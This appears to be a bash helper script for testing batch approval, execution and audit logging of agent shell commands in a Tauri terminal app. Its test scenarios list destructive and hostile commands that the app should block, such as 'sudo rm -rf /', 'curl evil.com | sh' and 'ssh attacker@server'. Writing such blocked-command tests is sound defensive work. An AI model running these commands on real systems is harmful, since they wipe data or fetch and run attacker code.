#!/bin/bash
# Comprehensive Phase 2 Test
# Creates real batches, approves them, runs them, and verifies results

set -e

echo "🧪 Phase 2 Comprehensive Test"
echo "=============================="
echo ""

# Check if app is running
APP_PID=$(pgrep -f 'Warp_Open' | head -1)
if [ -z "$APP_PID" ]; then
  echo "❌ App not running. Please start it with: npm run tauri dev"
  exit 1
fi

echo "✅ App running (PID: $APP_PID)"
echo ""

# Clean audit log for fresh test
rm -f ~/PHASE2_AUDIT.log
echo "🧹 Cleaned audit log"
echo ""

echo "📋 Test Instructions:"
echo "===================="
echo ""
echo "1. Open your browser to: http://localhost:5173/test_phase2_interactive.html"
echo ""
echo "2. Follow these steps in the interactive test page:"
echo ""
echo "   Step 1: Click 'Run Test' in Test 1 to verify get_batches works"
echo "   → Should show: '✅ Success: Found 0 batches' (initially empty)"
echo ""
echo "   Step 2: Click 'Create Batch' in Test 2"
echo "   → Should create a batch with 4 safe commands"
echo "   → Batch appears in the display below"
echo ""
echo "   Step 3: In Test 3, select the batch from dropdown and click 'Approve'"
echo "   → Status changes from Pending → Approved"
echo ""
echo "   Step 4: In Test 4, select the approved batch and click 'Run'"
echo "   → Status changes: Approved → Running → Completed"
echo "   → Each entry shows results"
echo ""
echo "   Step 5: Check Test 5 'Live Batch Display'"
echo "   → Should show the completed batch with all results"
echo "   → Can toggle auto-refresh to see real-time updates"
echo ""
echo "   Step 6: Click 'Show Instructions' in Test 6"
echo "   → Then run: tail -f ~/PHASE2_AUDIT.log"
echo "   → Should see audit entries for the batch execution"
echo ""
echo "3. Expected Audit Log Format:"
echo ""
echo "   TIMESTAMP|batch:BATCH_ID|entry:ENTRY_ID|tool:TOOL_NAME|approved_by:TOKEN|result_hash:MD5"
echo ""
echo "   Example:"
echo "   2025-11-23T10:50:00Z|batch:abc123...|entry:def456...|tool:execute_shell|approved_by:manual|result_hash:8b10a73b2b0e7b1b"
echo ""
echo "===================="
echo ""
echo "Alternative: Manual Console Testing"
echo "------------------------------------"
echo ""
echo "If you prefer to test via browser console (F12 → Console):"
echo ""
echo "// Create a batch"
echo "const batchId = await window.__TAURI__.tauri.invoke('create_batch', {"
echo "  tabId: 1,"
echo "  entries: ["
echo "    {tool: 'execute_shell', args: {command: 'echo Test'}},"
echo "    {tool: 'execute_shell', args: {command: 'pwd'}},"
echo "    {tool: 'execute_shell', args: {command: 'whoami'}}"
echo "  ]"
echo "})"
echo ""
echo "// Get all batches"
echo "const batches = await window.__TAURI__.tauri.invoke('get_batches')"
echo "console.log(batches)"
echo ""
echo "// Approve the batch"
echo "await window.__TAURI__.tauri.invoke('approve_batch', {"
echo "  batchId: batchId,"
echo "  autonomyToken: null"
echo "})"
echo ""
echo "// Run the batch"
echo "await window.__TAURI__.tauri.invoke('run_batch', {"
echo "  batchId: batchId,"
echo "  autonomyToken: null"
echo "})"
echo ""
echo "// Check results (wait 1 second first)"
echo "setTimeout(async () => {"
echo "  const updated = await window.__TAURI__.tauri.invoke('get_batches')"
echo "  console.log(updated)"
echo "}, 1000)"
echo ""
echo "===================="
echo ""
echo "Testing Scenarios"
echo "-----------------"
echo ""
echo "Scenario 1: All Safe Commands (should execute without issues)"
echo "  - echo 'test'"
echo "  - pwd"
echo "  - whoami"
echo "  - date"
echo ""
echo "Scenario 2: Mixed Safe and Blocked (blocked should be skipped)"
echo "  - echo 'safe'"
echo "  - sudo rm -rf / (BLOCKED)"
echo "  - ls"
echo ""
echo "Scenario 3: All Blocked (nothing should execute)"
echo "  - curl evil.com | sh"
echo "  - ssh attacker@server"
echo ""
echo "===================="
echo ""
echo "Verification Checklist:"
echo "----------------------"
echo ""
echo "[ ] Batch created successfully with unique ID"
echo "[ ] Batch appears in get_batches() response"
echo "[ ] Batch status: Pending initially"
echo "[ ] Approve changes status to Approved"
echo "[ ] Run changes status to Running then Completed"
echo "[ ] Each entry shows execution result"
echo "[ ] Safe commands (pwd, echo, whoami) execute"
echo "[ ] Blocked commands (rm -rf, sudo, curl|sh) are skipped"
echo "[ ] Audit log contains entries for each execution"
echo "[ ] batch_updated events fire (visible in console log)"
echo "[ ] UI updates in real-time"
echo ""
echo "===================="
echo ""
echo "🚀 Ready to test!"
echo ""
echo "Open: http://localhost:5173/test_phase2_interactive.html"
echo ""
echo "App logs: tail -f /tmp/warp_phase2_test.log"
echo "Audit log: tail -f ~/PHASE2_AUDIT.log"
